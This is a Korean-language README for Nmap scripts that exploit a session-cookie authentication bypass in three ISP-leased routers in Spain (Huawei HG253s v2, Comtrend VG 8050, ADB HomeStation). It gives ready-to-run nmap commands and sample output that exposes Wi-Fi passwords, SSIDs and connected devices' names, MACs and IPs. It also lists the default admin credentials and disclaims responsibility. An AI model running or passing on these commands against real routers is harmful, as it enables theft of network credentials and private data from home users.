
라우터에서 정보를 검색하기 위한 일부 NSE 스크립트
라우터에서 정보를 검색하기 위한 일부 NSE 스크립트입니다.
이 스크립트들의 작성자는 VicenDominguez입니다. 그는 Huawei에서 0-Day를 발견했으며 저는 다른 두 가지를 위해 수정만 했습니다.
이 스크립트의 작성자는 이 스크립트의 사용에 대해 책임을 지지 않습니다.
#Huawei HG253s v2 Vodafone-Spain은 스페인 고객에게 새로운 Huawei HG253v2 라우터를 임대하기 시작했습니다. 이 새로운 라우터는 새로운 펌웨어 버전과 함께 제공됩니다.
##취약점 기본적으로 일부 관리 웹페이지에서 세션 쿠키를 검증하지 않습니다. 따라서 인터넷에 노출된 모든 라우터에서 해당 URL로부터 직접 정보를 얻을 수 있습니다.
##사용법
nmap --script=http-enum-vodafone-hua253s.nse -p80,443 -sS x.x.x.x
Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum-vodafone-hua253s:
| SSID: vodafone070 (14:b9:XX:XX:XX:XX) Password: (AES) 123456
| Device: android-246e67b281179679-Wireless MAC: 48:5A:3F:XX:XX:XX IP: 192.168.0.XX
#Comtrend VG 8050 Telefonica-Spain은 스페인 고객에게 새로운 Comtrend VG 8050 라우터를 임대하기 시작했습니다. 이 새로운 라우터는 새로운 펌웨어 버전과 함께 제공됩니다. 이 버그는 DaniLabs에 의해 발견되었습니다.
##취약점 기본적으로 일부 관리 웹페이지에서 세션 쿠키를 검증하지 않습니다. 따라서 인터넷에 노출된 모든 라우터에서 해당 URL로부터 직접 정보를 얻을 수 있습니다.
##사용법
nmap --script=http-enum-telefonica-comtrend-vg-8050.nse -p80,443 -sS x.x.x.x
Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum-telefonica-comtrend-vg-8050:
| SSID: MOVISTAR_XXX
| Cipher Algorithm: WPA
| Password WEP:
| Password WPA: gTU3NkXE44RYjuM2RrxM
| Password WPA2:
| Device: 192.168.0.X MAC: 5c:97:X:X:X:X IP: 192.168.0.X
#ADB P.DGA4001N a.k.a HomeStation Telefonica-Spain은 스페인 고객에게 새로운 ADB P.DGA4001N 라우터를 임대하기 시작했습니다. 이 새로운 라우터는 새로운 펌웨어 버전과 함께 제공됩니다. 이 버그는 DaniLabs에 의해 발견되었습니다.
##취약점 기본적으로 일부 관리 웹페이지에서 세션 쿠키를 검증하지 않습니다. 따라서 인터넷에 노출된 모든 라우터에서 해당 URL로부터 직접 정보를 얻을 수 있습니다.
기본 자격 증명은 admin / 1234입니다. ##사용법
nmap --script=http-enum-telefonica-homestation.nse -p80,443 -sS x.x.x.x
Nmap scan report for x.x.x.x (x.x.x.x)
Host is up (0.34s latency).
PORT STATE SERVICE
80/tcp open http
| http-enum-telefonica-homestation:
| SSID: WLAN_HOME
| Cipher Algorithm: WEP
| Device: IphonePedro MAC: A8:8E:24:X:X:X IP: 192.168.1.X